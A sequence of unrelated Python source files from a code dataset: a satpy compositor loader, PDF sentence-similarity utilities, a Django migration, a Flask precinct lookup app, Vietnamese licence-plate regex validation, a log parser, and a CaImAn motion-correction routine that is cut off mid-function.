set([os.path.splitext(os.path.basename(fn))[0]\n for fn in composite_configs])\n non_sensor_yamls = ('visir',)\n sensor_names = [x for x in yaml_names if x not in non_sensor_yamls]\n return sensor_names\n\n def load_sensor_composites(self, sensor_name):\n \"\"\"Load all compositor configs for the provided sensor.\"\"\"\n config_filename = sensor_name + \".yaml\"\n logger.debug(\"Looking for composites config file %s\", config_filename)\n paths = get_entry_points_config_dirs('satpy.composites')\n composite_configs = config_search_paths(\n os.path.join(\"composites\", config_filename),\n search_dirs=paths, check_exists=True)\n if not composite_configs:\n logger.debug(\"No composite config found called %s\",\n config_filename)\n return\n self._load_config(composite_configs)\n\n def get_compositor(self, key, sensor_names):\n \"\"\"Get the compositor for *sensor_names*.\"\"\"\n for sensor_name in sensor_names:\n try:\n return self.compositors[sensor_name][key]\n except KeyError:\n continue\n raise KeyError(\"Could not find compositor '{}'\".format(key))\n\n def get_modifier(self, key, sensor_names):\n \"\"\"Get the modifier for *sensor_names*.\"\"\"\n for sensor_name in sensor_names:\n try:\n return self.modifiers[sensor_name][key]\n except KeyError:\n continue\n raise KeyError(\"Could not find modifier '{}'\".format(key))\n\n def load_compositors(self, sensor_names):\n \"\"\"Load all compositor configs for the provided sensors.\n Args:\n sensor_names (list of strings): Sensor names that have matching\n ``sensor_name.yaml`` config files.\n Returns:\n (comps, mods): Where `comps` is a dictionary:\n sensor_name -> composite ID -> compositor 
object\n And `mods` is a dictionary:\n sensor_name -> modifier name -> (modifier class,\n modifiers options)\n Note that these dictionaries are copies of those cached in\n this object.\n \"\"\"\n comps = {}\n mods = {}\n for sensor_name in sensor_names:\n if sensor_name not in self.compositors:\n self.load_sensor_composites(sensor_name)\n if sensor_name in self.compositors:\n comps[sensor_name] = DatasetDict(\n self.compositors[sensor_name].copy())\n mods[sensor_name] = self.modifiers[sensor_name].copy()\n return comps, mods\n\n def _get_sensor_id_keys(self, conf, sensor_id, sensor_deps):\n try:\n id_keys = conf['composite_identification_keys']\n except KeyError:\n try:\n id_keys = self._sensor_dataid_keys[sensor_deps[-1]]\n except IndexError:\n id_keys = minimal_default_keys_config\n self._sensor_dataid_keys[sensor_id] = id_keys\n return id_keys\n\n def _load_config(self, composite_configs):\n if not isinstance(composite_configs, (list, tuple)):\n composite_configs = [composite_configs]\n\n conf = {}\n for composite_config in composite_configs:\n with open(composite_config, 'r', encoding='utf-8') as conf_file:\n conf = recursive_dict_update(conf, yaml.load(conf_file, Loader=UnsafeLoader))\n try:\n sensor_name = conf['sensor_name']\n except KeyError:\n logger.debug('No \"sensor_name\" tag found in %s, skipping.',\n composite_configs)\n return\n\n sensor_id = sensor_name.split('/')[-1]\n sensor_deps = sensor_name.split('/')[:-1]\n\n compositors = self.compositors.setdefault(sensor_id, DatasetDict())\n modifiers = self.modifiers.setdefault(sensor_id, {})\n\n for sensor_dep in reversed(sensor_deps):\n if sensor_dep not in self.compositors or sensor_dep not in self.modifiers:\n self.load_sensor_composites(sensor_dep)\n\n if sensor_deps:\n compositors.update(self.compositors[sensor_deps[-1]])\n modifiers.update(self.modifiers[sensor_deps[-1]])\n\n id_keys = self._get_sensor_id_keys(conf, sensor_id, sensor_deps)\n mod_config_helper = _ModifierConfigHelper(modifiers, id_keys)\n configured_modifiers = conf.get('modifiers', {})\n mod_config_helper.parse_config(configured_modifiers, composite_configs)\n\n comp_config_helper = _CompositeConfigHelper(compositors, id_keys)\n configured_composites = conf.get('composites', {})\n comp_config_helper.parse_config(configured_composites, composite_configs)\n","sub_path":"config_loader.py","file_name":"config_loader.py","file_ext":"py","file_size_in_byte":12396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
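A hedged usage sketch of the loader above, using only the methods shown in this record ('seviri' is an illustrative sensor name; any sensor with a matching composites/<name>.yaml config works):

    loader = CompositorLoader()
    comps, mods = loader.load_compositors(['seviri'])
    # comps maps sensor name -> DatasetDict of composite ID -> compositor object
    print(sorted(str(key) for key in comps.get('seviri', {}))[:5])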
+{"seq_id":"565679093","text":"import re\nimport pdftotext\nimport streamlit as st\nimport pandas as pd\nfrom scipy.spatial.distance import cosine\nfrom snowballstemmer import EnglishStemmer # Use snowball stemming for turkish stemming\nfrom sklearn.feature_extraction.text import CountVectorizer\n\nengStem = EnglishStemmer()\nall_stopwords = [] # Add stopwords if needed.\n\n\n@st.cache\ndef clean_pdf_page(page): # Cleans a pdftotext page\n \"\"\"Takes a long string represeting a page and returns the cleaned sentences\n \n Returns:\n list -- list of sentences\n \"\"\"\n return [re.sub(\"\\s+\", \" \", i.strip()) for i in page.split(\"\\n\")]\n\n\ndef read_pdf_file(file):\n \"\"\"Converts a file to a pdftotext object\n \n Arguments:\n file {file} -- PDF File\n \n Returns:\n pdftotext.PDF -- pdftotext representation of the file\n \"\"\"\n return pdftotext.PDF(file)\n\n\n@st.cache\ndef get_sections(pages):\n \"\"\"Get the different sections in a given page\n \n Arguments:\n pages {list} -- list of pages to extract sections from\n \n Returns:\n dict -- Dictionary containing the section names and their values\n \"\"\"\n sections = {}\n section_pages = {}\n current_section_name = None\n current_section = []\n\n for page_num, page in enumerate(pages):\n clean_page = [re.sub(\"\\s+\", \" \", i.strip()) for i in page.split(\"\\n\")]\n\n for ind, i in enumerate(clean_page):\n\n if (\n re.findall(\"^Section \\d+\", i)\n and \"page\" not in i\n or (re.sub(\"\\d+ [\\w+\\s+]+\", \"\", i) == \"\" and ind == 0 and len(i) > 6)\n ):\n if current_section_name is not None:\n sections[current_section_name] = current_section\n current_section = []\n current_section_name = i\n break\n\n section_pages[page_num + 1] = current_section_name or \"No Section\"\n\n current_section.extend(clean_page)\n return sections, section_pages\n\n\n@st.cache(allow_output_mutation=True, suppress_st_warning=True)\ndef calculate_distance(df1, df2):\n \"\"\"Calculate the cosine distance between all vectors in two dataframes\n \n Arguments:\n df1 {DataFrame} -- Dataframe of first set of features\n df2 {DataFrame} -- Dataframe of second set of features\n \n Returns:\n Dataframe -- Dataframe containing the distances between the vectors\n \"\"\"\n my_bar = st.progress(0)\n total_length = df1.shape[0] * df2.shape[0]\n incr = 0.0\n output = {}\n for ind in df1.index:\n output[ind] = {}\n for ind2 in df2.index:\n output[ind][ind2] = cosine(df1.loc[ind], df2.loc[ind2])\n incr += 1.0\n my_bar.progress(incr / total_length)\n\n return pd.DataFrame(output).dropna(how=\"all\").dropna(how=\"all\", axis=1)\n\n\n@st.cache\ndef get_similar_sentences(df_1, df_2):\n \"\"\"Using scikit-learn's count vectorizer, vectorize the two sets of text and find the best closest ones.\n \n Arguments:\n df_1['Sentance'] {list} -- list of first group of text\n df_2['Sentance'] {list} -- list of second group of text\n \n Returns:\n Dataframe -- Dataframe of all similar words and word pages between the two texts\n \"\"\"\n cv = CountVectorizer(stop_words=\"english\")\n\n cv.fit(pd.concat([df_1, df_2])[\"Sentance\"])\n\n df_1_feat = pd.DataFrame(\n cv.transform(df_1[\"Sentance\"]).toarray(), index=df_1[\"Sentance\"].index\n )\n df_2_feat = pd.DataFrame(\n cv.transform(df_2[\"Sentance\"]).toarray(), index=df_2[\"Sentance\"].index\n )\n\n score = calculate_distance(df_1_feat, df_2_feat)\n\n score_vals = score.min()\n mins = score_vals[score_vals < 0.5].index\n results = []\n for i, j in score.idxmin().loc[mins].items():\n results.append(\n (\n df_1[\"Sentance\"].loc[i],\n 
df_1[\"Page\"].loc[i],\n df_2[\"Sentance\"].loc[j],\n df_2[\"Page\"].loc[j],\n )\n )\n return pd.DataFrame(\n results,\n columns=[\"File 1 Sentance\", \"File 1 Page\", \"File 2 Sentance\", \"File 2 Page\"],\n )\n\n\n@st.cache\ndef clean_text(text):\n \"\"\"Clean a text by lowering the text, removing symbols and stopwords.\n \n Arguments:\n text {string} -- string to clean\n \n Returns:\n string -- cleaned string\n \"\"\"\n text = text.lower() # Convert the text to lower case\n text = re.sub(\",\", \" \", text) # Replace commas with an extra space\n\n text = re.sub(\"<.*?>\", \"\", text) # Clean out any HTML tags\n text = re.sub(\"\\s+\", \" \", text) # Replace multiple spaces with\n\n text = text.split()\n\n text = [\n re.sub(\"[^\\w]\", \"\", i.rstrip()) for i in text if i not in all_stopwords\n ] # Clean out stopwords\n\n # text = engStem.stemWords(text)# English Stemming\n\n text = \" \".join(text)\n return text\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"611981883","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('theEmpireAdmin', '0019_expedition_expedition_activities'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='ExpeditionActivities',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('activity', models.CharField(max_length=70, null=True, blank=True)),\n ('expedition_icon', models.ImageField(null=True, upload_to=b'media/', blank=True)),\n ],\n ),\n migrations.CreateModel(\n name='ProjectCategory',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('category', models.CharField(max_length=50, null=True, blank=True)),\n ('project', models.ForeignKey(related_name='categories', to='theEmpireAdmin.Project')),\n ],\n ),\n migrations.RemoveField(\n model_name='expedition',\n name='expedition_activities',\n ),\n migrations.AlterField(\n model_name='expedition',\n name='cost',\n field=models.CharField(max_length=15, null=True, blank=True),\n ),\n migrations.AlterField(\n model_name='expedition',\n name='template_used',\n field=models.IntegerField(default=1, choices=[(1, b'template_1 (video in description template)'), (2, b'template_2 (video at bottom template'), (3, b'template_3 (video on landing template)')]),\n ),\n migrations.AddField(\n model_name='expeditionactivities',\n name='expedition',\n field=models.ForeignKey(related_name='activities', blank=True, to='theEmpireAdmin.Expedition', null=True),\n ),\n ]\n","sub_path":"theEmpireAdmin/migrations/0020_auto_20150615_0308.py","file_name":"0020_auto_20150615_0308.py","file_ext":"py","file_size_in_byte":1967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"383461832","text":"from flask import Flask\nfrom flask_jsglue import JSGlue\nfrom controllers.home import home\nfrom controllers.models import models\nfrom controllers.signin import signin\nfrom controllers.emailer import emailer\n\napp = Flask(__name__)\njsglue = JSGlue(app)\napp.register_blueprint(home)\napp.register_blueprint(models)\napp.register_blueprint(signin)\napp.register_blueprint(emailer)\n\n\n@app.route('/wplookup', methods=['GET', 'POST'])\ndef ward_precinct_lookup():\n from flask import request\n\n if request.method == 'GET':\n from flask import render_template\n\n sql = \"SELECT DISTINCT street_type FROM ward_precinct ORDER BY street_type\"\n cursor = the_dataset.cxn.cursor()\n cursor.execute(sql)\n rex = cursor.fetchall()\n types = [r[0] for r in rex]\n types[0] = \"None\"\n\n sql = (\"SELECT name, type, code FROM jurisdictions WHERE county_code=81 \"\n \"ORDER BY name\")\n cursor = the_dataset.cxn.cursor()\n cursor.execute(sql)\n rex = cursor.fetchall()\n jurisdictions = [{'id': r[2], 'value': r[0] + ' ' + r[1]} for r in rex]\n\n return render_template(\n \"ward_precinct.html\",\n types=types,\n jurisdictions=jurisdictions\n )\n else:\n from flask import jsonify\n from db_utils.precinct_finder import block_typer, Address\n\n prefix = request.form['street_prefix']\n if prefix == '0':\n prefix = ''\n suffix = request.form['street_suffix']\n if suffix == '0':\n suffix = ''\n\n address = Address(\n number=request.form['street_number'],\n prefix=prefix,\n street=request.form['street_name'],\n type=request.form['street_type'],\n suffix=suffix\n )\n jcode = request.form['jurisdiction']\n\n address_is_even = (int(address.number) % 2 == 0)\n btype = block_typer(the_dataset.cxn, jcode, address)\n if btype[0] == btype[1]:\n result = btype[0]\n elif btype[0] and address_is_even:\n result = btype[0]\n elif btype[1] and not address_is_even:\n result = btype[1]\n else:\n result = \"Human lookup required\"\n\n return jsonify(result)\n\n\nif __name__ == '__main__':\n import os\n from models.dataset import the_dataset\n\n app_path = os.path.dirname(__file__)\n the_dataset.open(app_path)\n # the_dataset.load()\n\n app.run(host='0.0.0.0')\n","sub_path":"adlaiweb.py","file_name":"adlaiweb.py","file_ext":"py","file_size_in_byte":2462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"244197867","text":"import os\n\nimport mojimoji\nfrom pyknp import Juman\n\njumanpp = Juman()\n\nsentences = []\nwith open('calendar.txt') as f:\n for line in f:\n result = jumanpp.analysis(mojimoji.han_to_zen(line.rstrip()))\n sentence = ' '.join(mrph.midasi for mrph in result.mrph_list())\n sentences.append(sentence)\n\nwith open(os.path.join('SST-2', 'test.tsv'), 'w') as f:\n f.write('index\\tsentence\\n')\n for index, sentence in enumerate(sentences):\n f.write(str(index) + '\\t' + sentence + '\\n')\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"561740421","text":"# -*- coding: utf-8 -*-\nimport re\n# Military plate license\n# AA | 12-34\n# prefix | suffix\nmilitary_prefix = ['AA', 'AB', 'AC', 'AD', 'AV', 'AT', 'AN', 'AP',\n 'BBB', 'BC', 'BH', 'BK', 'BL', 'BT', 'BP', 'BS', 'BV',\n 'HA', 'HB', 'HC', 'HD', 'HE', 'HT', 'HQ', 'HN', 'HH',\n 'KA', 'KB', 'KC', 'KD', 'KV', 'KP', 'KK', 'KT', 'KN',\n 'PA', 'PP', 'PM', 'PK', 'PT', 'PY', 'PQ', 'PX', 'PC', 'HL',\n 'QA', 'QB', 'QH',\n 'TC', 'TH', 'TK', 'TT', 'TM', 'TN', 'DB', 'ND', 'CH', 'VB', 'VK', 'CV', 'CA', 'CP', 'CM', 'CC',\n 'VT', 'CB']\n\n# Civil plate license\n# 26 | LD | 88678\n# prefix | postfix | suffix\ncivil_prefix = range(10, 100) # 10, 11, ..., 99\nspecial_postfix = ['LD', 'DA', 'R', 'T', 'MK', 'CD']\n\n# Biển số xe 50cc\n# XX-xx / XXX.XX\n# seri biển số sử dụng lần lượt một trong 20 chữ cái sau đây: A, B, C, D, E, F, G, H, K, L, M, N, P, S, T, U, V, X, Y, Z kết hợp với một trong các chữ cái sau: A, B, C, D, E, F, H, K, L, M, N, P, R, S, T, U, V, X, Y, Z\nregex_50cc_moto = '^[1-9][0-9][ABCDEFGHKLMNPSTUVXYZ][ABCDEFHKLMNPRSTUVXYZ][0-9]{4,5}$'\n\n# Biển số xe 100cc - 150cc\n# XX-Xn / XXX.XX\n# seri biển số sử dụng một trong 19 chữ cái B, C, D, E, F, G, H, K, L, M, N, P, S, T, U, V, X, Y, Z kết hợp với một chữ số tự nhiên từ 1 đến 9\nregex_100cc_moto = '^[1-9][0-9][BCDEFGHKLMNPSTUVXYZ][1-9][0-9]{4,5}$'\n\n# Biển số xe Phân khối lớn\n# XX-Xn / XXX.XX\n# seri sử dụng chữ cái A kết hợp với 1 chữ s��� tự nhiên từ 1 đến 9\nregex_powerful_moto = '^[1-9][0-9]A[1-9][0-9]{4,5}$'\n\n# Biển số xe Ô tô - tải\n# XXn/nn- - XXX.XX\n# sêri biển số sử dụng lần lượt một trong 20 chữ cái sau đây: A, B, C, D, E, F, G, H, K, L, M, N, P, S, T, U, V, X, Y, Z\nregex_oto = '^[1-9][0-9][ABCDEFGHKLMNPSTUVXYZ][0-9]{4,5}$'\n\n# Biển số đặc biệt\nregex_specical = '^[1-9][0-9](LD|DA|R|T|MK|CD|T#)[0-9]{4,5}$'\n\n# Military plate license\n# AA | 12-34\n# prefix | suffix\nregex_military = '^(AA|AB|AC|AD|AV|AT|AN|AP|BBB|BC|BH|BK|BL|BT|BP|BS|BV|HA|HB|HC|HD|HE|HT|HQ|HN|HH|\\\n KA|KB|KC|KD|KV|KP|KK|KT|KN|PA|PP|PM|PK|PT|PY|PQ|PX|PC|HL|QA|QB|QH|TC|TH|TK|TT|\\\n TM|TN|DB|ND|CH|VB|VK|CV|CA|CP|CM|CC|VT|CB)[0-9]{4}$'\n\n \n# Electric motorbike\n# XX-MĐx / XXX.XX\n#regex_electric_moto = r'^[1-9][0-9]M[#D][1-9][0-9]{4,5}$'\nregex_electric_moto = r'^[1-9][0-9]M[#D][1-9][0-9]{5}$'\n\n# Biển số tạm thời\nregex_temp = r'^T[1-9][0-9][0-9]{4,5}$'\n\n# Foreign plate license\n# 41-291-NG-01\nregex_foreign = r'^[1-9][0-9][0-9]{3}(NN|NG|CV|QT)[0-9]{2}$'\n\npattern_general_list = [regex_electric_moto, regex_military, regex_specical, regex_powerful_moto, regex_100cc_moto, regex_50cc_moto, regex_temp, regex_foreign, regex_oto]\n\npattern_car_list = [None, regex_military, regex_specical, None, None, None, regex_temp, regex_foreign, regex_oto]\n\ndef matching_plate(plate, label=None):\n if label is None:\n pattern_list = pattern_general_list\n elif label == 'car' or label == 'van' or label == 'truck':\n pattern_list = pattern_car_list\n \n for i in range(len(pattern_list)):\n pattern = pattern_list[i]\n if pattern is not None:\n prog = re.compile(pattern)\n result = prog.match(plate)\n #print(pattern, result, plate)\n if result is not None:\n return i\n return -1\n \ndef postprocess(plate, probs):\n thresh = 0.6\n plate = list(plate)\n \n if len(plate) <= 5:\n return \"\"\n num_alpha = 0\n for c in plate:\n if c.isalpha() or c == '#':\n num_alpha += 1\n\n# if num_alpha == 0:\n# if plate[2] == '6':\n# plate[2] = 'G'\n# elif plate[2] == '8':\n# plate[2] = 'B'\n# elif plate[2] == '2':\n# plate[2] = 'Z'\n# elif plate[2] == '0':\n# 
plate[2] = 'D'\n \n \n plate = ''.join(plate)\n #print(plate, probs)\n for i in range(len(plate)):\n if probs[i] < thresh:\n return \"\"\n pattern_index = matching_plate(plate)\n if pattern_index == -1:\n return \"\"\n else:\n return plate\n \nif __name__ == '__main__':\n #Biển số xe 50cc\n plate_test_0 = {\"26AA0021\": 'T', \"26AA00212\": 'T', \"26AO00212\": 'F', \"26AB002125\": 'F', \"26AB002\": 'F', \"6AB0021\": 'F'}\n for plate in plate_test_0.keys():\n pattern_index = matching_plate(plate)\n if pattern_index == -1:\n result = \"F\"\n else:\n result = \"T\"\n if result != plate_test_0[plate]:\n print(\"Test {} is failed.\".format(plate))\n # Biển số xe 100cc - 150cc\n plate_test_1 = {\"26B10034\": 'T', \"26B100345\": 'T'}\n for plate in plate_test_1.keys():\n pattern_index = matching_plate(plate)\n if pattern_index == -1:\n result = \"F\"\n else:\n result = \"T\"\n if result != plate_test_1[plate]:\n print(\"Test {} is failed.\".format(plate), pattern_index)\n","sub_path":"ocr_plate_model/attention_ocr/postprocess.py","file_name":"postprocess.py","file_ext":"py","file_size_in_byte":5131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
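A brief, hypothetical demonstration of the two gates in postprocess: every per-character probability must clear the 0.6 threshold, and the string must match one of the plate patterns:

    plate = '26B10034'  # matches the 100cc-150cc motorbike pattern
    print(postprocess(plate, [0.95] * len(plate)))  # -> '26B10034'
    print(postprocess(plate, [0.40] * len(plate)))  # -> '' (low-confidence characters)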
+{"seq_id":"206246283","text":"\"\"\"This is the entry point of the program.\"\"\"\n\n\ndef create_box(height, width, character):\n across = width * character\n grid = \"\"\n\n for i in range(height):\n grid += across\n grid += '\\n'\n return grid\n\nif __name__ == '__main__':\n create_box(3, 4, '*')\n","sub_path":"create_box/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"19992376","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Date : 2017-06-29 15:58:33\n# @Author : Your Name (you@example.org)\n# @Link : http://example.org\n# @Version : $Id$\nfrom __future__ import print_function\nimport os\nimport time\nfrom collections import defaultdict\ntry:\n import ujson as json\nexcept ImportError:\n import json\n\nLOG_LIST = (\n 'gateway.log',\n 'account.log',\n 'game.log',\n 'im.log',\n 'battle.log',\n 'login.log',\n)\n\nPATH = '../log/debug/gateway.log'\nDATE_FMT = '%Y-%m-%d %H:%M:%S%z'\n\ndef filter_input_log(path):\n '''读取日志, 过滤数据'''\n ret = defaultdict(list)\n with open(path, 'r', encoding='utf8', errors='ignore') as f:\n for line in f:\n text = line.split(' ')\n if len(text) <= 5 or text[3] not in {'handle', 'func', 'section'}:\n continue\n ts = \" \".join(text[:2])\n ts = time.mktime(time.strptime(ts, DATE_FMT))\n name, cost = text[4:6]\n cost = cost.strip('\\n')\n record = (ts, name, cost)\n ret[text[3]].append(record)\n return ret\n\ndef each_log():\n '''遍历所有日志'''\n ret = {}\n for log_file in LOG_LIST:\n path = '../log/debug/%s' % log_file\n try:\n server = os.path.splitext(log_file)[0]\n ret[server] = filter_input_log(path)\n except Exception:\n print(path)\n import traceback\n traceback.print_exc()\n return ret\n\n\ndef main():\n ret = each_log()\n with open('parse_result.json', 'w') as f:\n json.dump(ret, f)\n print ('over.')\n\nif __name__ == '__main__':\n main() ","sub_path":"parse_log.py","file_name":"parse_log.py","file_ext":"py","file_size_in_byte":1653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"10361430","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author: Sebastian,Casper,Melisa,Morgane\n\"\"\"\n\nimport datetime\nimport logging\nimport os\nimport pickle\n\nimport src.configuration\n\nimport caiman as cm\nimport numpy as np\nfrom caiman.motion_correction import MotionCorrect\nfrom caiman.source_extraction.cnmf import params as params\n\nfrom src.Database.database_connection import database\n\ncursor = database.cursor()\n\n\ndef run_motion_correction(cropping_file, dview):\n \"\"\"\n This is the function for motion correction. Its goal is to take in a decoded and\n cropped .tif file, perform motion correction, and save the result as a .mmap file.\n\n This function is only runnable on the cn76 server because it requires parallel processing.\n\n Args:\n cropping_file: tif file after cropping\n dview: cluster\n\n Returns:\n row: pd.DataFrame object\n The row corresponding to the motion corrected analysis state.\n \"\"\"\n # Get output file paths\n\n data_dir = os.environ['DATA_DIR_LOCAL'] + 'data/interim/motion_correction/'\n sql = \"SELECT mouse,session,trial,is_rest,decoding_v,cropping_v,motion_correction_v,input,home_path,decoding_main FROM Analysis WHERE cropping_main=? ORDER BY motion_correction_v\"\n val = [cropping_file, ]\n cursor.execute(sql, val)\n result = cursor.fetchall()\n data = []\n inter = []\n for x in result:\n inter = x\n for y in inter:\n data.append(y)\n\n # Update the database\n\n if data[6] == 0:\n data[6] = 1\n file_name = f\"mouse_{data[0]}_session_{data[1]}_trial_{data[2]}.{data[3]}.v{data[4]}.{data[5]}.{data[6]}\"\n output_meta_pkl_file_path = f'meta/metrics/{file_name}.pkl'\n sql1 = \"UPDATE Analysis SET motion_correction_meta=?,motion_correction_v=? WHERE cropping_main=? \"\n val1 = [output_meta_pkl_file_path, data[6], cropping_file]\n cursor.execute(sql1, val1)\n\n else:\n data[6] += 1\n file_name = f\"mouse_{data[0]}_session_{data[1]}_trial_{data[2]}.{data[3]}.v{data[4]}.{data[5]}.{data[6]}\"\n output_meta_pkl_file_path = f'meta/metrics/{file_name}.pkl'\n sql2 = \"INSERT INTO Analysis (motion_correction_meta,motion_correction_v) VALUES (?,?)\"\n val2 = [output_meta_pkl_file_path, data[6]]\n cursor.execute(sql2, val2)\n database.commit()\n sql3 = \"UPDATE Analysis SET decoding_main=?,decoding_v=?,mouse=?,session=?,trial=?,is_rest=?,input=?,home_path=?,cropping_v=?,cropping_main=? WHERE motion_correction_meta=? AND motion_correction_v=?\"\n val3 = [data[9], data[4], data[0], data[1], data[2], data[3], data[7], data[8], data[5], cropping_file,\n output_meta_pkl_file_path, data[6]]\n cursor.execute(sql3, val3)\n database.commit()\n output_meta_pkl_file_path_full = data_dir + output_meta_pkl_file_path\n\n # Calculate movie minimum to subtract from movie\n cropping_file_full = os.environ['DATA_DIR_LOCAL'] + cropping_file\n min_mov = np.min(cm.load(cropping_file_full))\n\n # Apply the parameters to the CaImAn algorithm\n\n sql5 = \"SELECT motion_correct,pw_rigid,save_movie_rig,gSig_filt,max_shifts,niter_rig,strides,overlaps,upsample_factor_grid,num_frames_split,max_deviation_rigid,shifts_opencv,use_conda,nonneg_movie, border_nan FROM Analysis WHERE cropping_main=? 
\"\n val5 = [cropping_file, ]\n cursor.execute(sql5, val5)\n myresult = cursor.fetchall()\n para = []\n aux = []\n for x in myresult:\n aux = x\n for y in aux:\n para.append(y)\n parameters = {'motion_correct': para[0], 'pw_rigid': para[1], 'save_movie_rig': para[2],\n 'gSig_filt': (para[3], para[3]), 'max_shifts': (para[4], para[4]), 'niter_rig': para[5],\n 'strides': (para[6], para[6]),\n 'overlaps': (para[7], para[7]), 'upsample_factor_grid': para[8], 'num_frames_split': para[9],\n 'max_deviation_rigid': para[10],\n 'shifts_opencv': para[11], 'use_cuda': para[12], 'nonneg_movie': para[13],\n 'border_nan': para[14]}\n caiman_parameters = parameters.copy()\n caiman_parameters['min_mov'] = min_mov\n opts = params.CNMFParams(params_dict=caiman_parameters)\n\n # Rigid motion correction (in both cases)\n\n logging.info('Performing rigid motion correction')\n t0 = datetime.datetime.today()\n\n # Create a MotionCorrect object\n\n mc = MotionCorrect([cropping_file_full], dview=dview, **opts.get_group('motion'))\n\n # Perform rigid motion correction\n\n mc.motion_correct_rigid(save_movie=parameters['save_movie_rig'], template=None)\n dt = int((datetime.datetime.today() - t0).seconds / 60) # timedelta in minutes\n logging.info(f' Rigid motion correction finished. dt = {dt} min')\n\n # Obtain template, rigid shifts and border pixels\n\n total_template_rig = mc.total_template_rig\n shifts_rig = mc.shifts_rig\n\n # Save template, rigid shifts and border pixels in a dictionary\n\n meta_pkl_dict = {\n 'rigid': {\n 'template': total_template_rig,\n 'shifts': shifts_rig,\n }\n }\n sql = \"UPDATE Analysis SET duration_rigid=? WHERE motion_correction_meta=? AND motion_correction_v=? \"\n val = [dt, output_meta_pkl_file_path, data[6]]\n cursor.execute(sql, val)\n\n if parameters['save_movie_rig'] == 1:\n # Load the movie saved by CaImAn, which is in the wrong\n # directory and is not yet cropped\n\n logging.info(f' Loading rigid movie for cropping')\n m_rig = cm.load(mc.fname_tot_rig[0])\n logging.info(f' Loaded rigid movie for cropping')\n\n # Get the cropping points determined by the maximal rigid shifts\n\n x_, _x, y_, _y = get_crop_from_rigid_shifts(shifts_rig)\n\n # Crop the movie\n\n logging.info(f' Cropping and saving rigid movie with cropping points: [x_, _x, y_, _y] = {[x_, _x, y_, _y]}')\n m_rig = m_rig.crop(x_, _x, y_, _y, 0, 0)\n meta_pkl_dict['rigid']['cropping_points'] = [x_, _x, y_, _y]\n sql = \"UPDATE Analysis SET motion_correction_cropping_points_x1=?,motion_correction_cropping_points_x2=?,motion_correction_cropping_points_y1=?,motion_correction_cropping_points_y2=? WHERE motion_correction_meta=? AND motion_correction_v=? \"\n val = [x_, _x, y_, _y, output_meta_pkl_file_path, data[6]]\n cursor.execute(sql, val)\n\n # Save the movie\n\n rig_role = 'alternate' if parameters['pw_rigid'] else 'main'\n fname_tot_rig = m_rig.save(data_dir + rig_role + '/' + file_name + '_rig' + '.mmap', order='C')\n logging.info(f' Cropped and saved rigid movie as {fname_tot_rig}')\n\n # Remove the remaining non-cropped movie\n\n os.remove(mc.fname_tot_rig[0])\n\n sql = \"UPDATE Analysis SET motion_correction_rig_role=? WHERE motion_correction_meta=? AND motion_correction_v=? 
\"\n val = [fname_tot_rig, output_meta_pkl_file_path, data[6]]\n cursor.execute(sql, val)\n database.commit()\n\n # If specified in the parameters, apply piecewise-rigid motion correction\n if parameters['pw_rigid'] == 1:\n logging.info(f' Performing piecewise-rigid motion correction')\n t0 = datetime.datetime.today()\n # Perform non-rigid (piecewise rigid) motion correction. Use the rigid result as a template.\n mc.motion_correct_pwrigid(save_movie=True, template=total_template_rig)\n # Obtain template and filename\n total_template_els = mc.total_template_els\n fname_tot_els = mc.fname_tot_els[0]\n\n dt = int((datetime.datetime.today() - t0).seconds / 60) # timedelta in minutes\n meta_pkl_dict['pw_rigid'] = {\n 'template': total_template_els,\n 'x_shifts': mc.x_shifts_els,\n 'y_shifts': mc.y_shifts_els # removed them initially because they take up space probably\n }\n\n logging.info(f' Piecewise-rigid motion correction finished. dt = {dt} min')\n\n # Load the movie saved by CaImAn, which is in the wrong\n # directory and is not yet cropped\n\n logging.info(f' Loading pw-rigid movie for cropping')\n m_els = cm.load(fname_tot_els)\n logging.info(f' Loaded pw-rigid movie for cropping')\n\n # Get the cropping points determined by the maximal rigid shifts\n\n x_, _x, y_, _y = get_crop_from_pw_rigid_shifts(np.array(mc.x_shifts_els),\n np.array(mc.y_shifts_els))\n # Crop the movie\n\n logging.info(f' Cropping and saving pw-rigid movie with cropping points: [x_, _x, y_, _y] = {[x_, _x, y_, _y]}')\n m_els = m_els.crop(x_, _x, y_, _y, 0, 0)\n meta_pkl_dict['pw_rigid']['cropping_points'] = [x_, _x, y_, _y]\n\n # Save the movie\n\n fname_tot_els = m_els.save(data_dir + 'main/' + file_name + '_els' + '.mmap', order='C')\n logging.info(f'Cropped and saved rigid movie as {fname_tot_els}')\n\n # Remove the remaining non-cropped movie\n\n os.remove(mc.fname_tot_els[0])\n\n sql = \"UPDATE Analysis SET motion_correction_main=?, motion_correction_cropping_points_x1=?,motion_correction_cropping_points_x2=?,motion_correction_cropping_points_y1=?,motion_correction_cropping_points_y2=?,duration_pw_rigid=? WHERE motion_correction_meta=? AND motion_correction_v=? 
